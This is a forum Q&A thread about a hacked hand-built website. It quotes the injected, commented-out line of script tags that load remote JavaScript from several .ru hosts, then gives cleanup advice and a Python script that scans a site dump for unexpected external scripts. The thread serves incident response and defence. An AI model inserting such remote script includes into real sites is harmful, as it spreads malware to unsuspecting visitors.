My website got hacked.. What should I do?


Question


My dad called me today and said people going to his website were getting 168 viruses trying to download to their computers. He isn't technical at all, and built the whole thing with a WYSIWYG editor.


I popped his site open and viewed the source, and there was a line of Javascript includes at the bottom of the source right before the closing HTML tag. They included this file (among many others): http://www.98hs.ru/js.js <-- TURN OFF JAVASCRIPT BEFORE YOU GO TO THAT URL.


So I commented it out for now. It turns out his FTP password was a plain dictionary word six letters long, so we think that's how it got hacked. We've changed his password to an 8+ digit non-word string (he wouldn't go for a passphrase since he is a hunt-n-peck typer).


I did a whois on 98hs.ru and found it is hosted from a server in Chile. There is actually an e-mail address associated with it too, but I seriously doubt this person is the culprit. Probably just some other site that got hacked...


I have no idea what to do at this point though as I've never dealt with this sort of thing before. Anyone have any suggestions?


He was using plain jane un-secured ftp through webhost4life.com. I don't even see a way to do sftp on their site. I'm thinking his username and password got intercepted?

So, to make this more relevant to the community, what steps should you take / what best practices should you follow to keep your website from getting hacked?


For the record, here is the line of code that "magically" got added to his file (and isn't in his file on his computer -- I've left it commented out just to make absolute sure it won't do anything on this page, although I'm sure Jeff would guard against this):

<!--script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script 
src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script-->

Recommended answer


Try and gather as much information as you can. See if the host can give you a log showing all the FTP connections that were made to your account. You can use those to see if it was even an FTP connection that was used to make the change and possibly get an IP address.


If you're using prepackaged software like WordPress, Drupal, or anything else that you didn't code, there may be vulnerabilities in upload code that allow this sort of modification. If it is custom built, double check any places where you allow users to upload files or modify existing files.


The second thing would be to take a dump of the site as-is and check everything for other modifications. It may just be one single modification they made, but if they got in via FTP who knows what else is up there.


Revert your site back to a known good status and, if need be, upgrade to the latest version.


There is a level of return you have to take into account too. Is the damage worth trying to track the person down or is this something where you just live and learn and use stronger passwords?
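The answer's second step (dump the site as-is and check everything for other modifications) is where a small script helps, because a hand-built site can have dozens of pages and the injected tags sat at the very bottom of the file. The following is an added example, not code from the question or the answer: it walks a dump of the live site, flags every `<script src=...>` whose host is neither the site itself nor an allowed host, and compares each file against the owner's local copy (the known-good version mentioned in the question) to list what was modified, added, or removed. The site contents, the file names and the allowed-host set are constructed for the example; the `98hs.ru` and `porv.ru` hosts are the ones quoted in the question.

```python
import hashlib
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample: the site dump as pulled from the host, and the owner's
# local copy (the "known good" version that never had the injected tags).
# The injected tags use unquoted src values, exactly as in the question.
LIVE_SITE = {
    "index.html": (
        "<html><body><h1>Welcome</h1>\n"
        '<script src="/js/menu.js"></script>\n'
        "</body>\n"
        "<script src=http://www.98hs.ru/js.js></script>"
        "<script src=http://www.porv.ru/js.js></script>\n"
        "</html>\n"
    ),
    "about.html": "<html><body><p>About us</p></body></html>\n",
    "gallery.html": "<html><body><p>Photos</p></body></html>\n",  # not in local copy
}
LOCAL_COPY = {
    "index.html": (
        "<html><body><h1>Welcome</h1>\n"
        '<script src="/js/menu.js"></script>\n'
        "</body>\n"
        "</html>\n"
    ),
    "about.html": "<html><body><p>About us</p></body></html>\n",
}


class ScriptSrcCollector(HTMLParser):
    """Collects the src attribute of every <script> tag, quoted or unquoted."""

    def __init__(self):
        super().__init__()
        self.sources = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            for name, value in attrs:
                if name == "src" and value:
                    self.sources.append(value)


def external_scripts(html, allowed_hosts):
    """Return script URLs whose host is not the site itself or an allowed host.

    Relative paths (no host) are served from the site's own files and are skipped;
    anything loaded from an unexpected third-party host is reported.
    """
    parser = ScriptSrcCollector()
    parser.feed(html)
    flagged = []
    for src in parser.sources:
        host = urlparse(src).netloc.lower()
        if host and host not in allowed_hosts:
            flagged.append(src)
    return flagged


def sha256(text):
    return hashlib.sha256(text.encode("utf-8")).hexdigest()


def compare_to_baseline(live, baseline):
    """Classify every file in the live dump against the known-good copy."""
    report = {"modified": [], "added": [], "missing": []}
    for name, content in live.items():
        if name not in baseline:
            report["added"].append(name)          # new file: nothing to compare, treat as suspect
        elif sha256(content) != sha256(baseline[name]):
            report["modified"].append(name)       # content drifted from the known-good copy
    report["missing"] = [name for name in baseline if name not in live]
    return report


def scan_site(live, baseline, allowed_hosts):
    """Combine the two checks into one report for the whole dump."""
    findings = {}
    for name, content in live.items():
        if name.endswith((".html", ".htm")):
            hits = external_scripts(content, allowed_hosts)
            if hits:
                findings[name] = hits
    return {
        "external_scripts": findings,
        "baseline": compare_to_baseline(live, baseline),
    }


if __name__ == "__main__":
    # Hypothetical allowed host: the site's own domain (none of the sample tags use it).
    result = scan_site(LIVE_SITE, LOCAL_COPY, {"www.example.com"})
    for page, urls in result["external_scripts"].items():
        print(f"{page}: loads scripts from unexpected hosts: {urls}")
    for kind, names in result["baseline"].items():
        if names:
            print(f"{kind}: {names}")
```

Running it against a real dump means reading each file from disk into the `LIVE_SITE` and `LOCAL_COPY` dictionaries; the baseline comparison is what catches changes that are not script tags at all (a modified `.htaccess`, an added upload handler), which is why the answer recommends checking everything rather than only the line that was noticed.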

